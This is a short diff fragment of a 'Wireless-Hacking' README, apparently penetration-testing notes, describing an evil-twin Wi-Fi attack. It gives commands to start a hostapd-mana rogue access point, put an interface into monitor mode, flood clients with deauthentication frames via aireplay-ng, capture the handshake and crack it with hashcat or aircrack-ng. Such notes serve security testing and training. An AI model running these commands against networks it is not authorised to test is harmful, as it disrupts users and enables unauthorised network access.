TDSSEC/Wireless-Hacking/README.md

 `hostapd-mana AP-Name.conf`

 Client will connect. (de-auth) and ensure stronger signal.
+To deauth - Use another interface to execute aireplay-ng to deauth!
+`airmon-ng start wlan1 3` = Set wlan1 interface on monitor mode on channel 3
+`aireplay-ng -0 0 -a <AP-MAC> wlan1mon`

 We can capture the handshake.

 3. Crack Handshake with Hashcat or aircrack-ng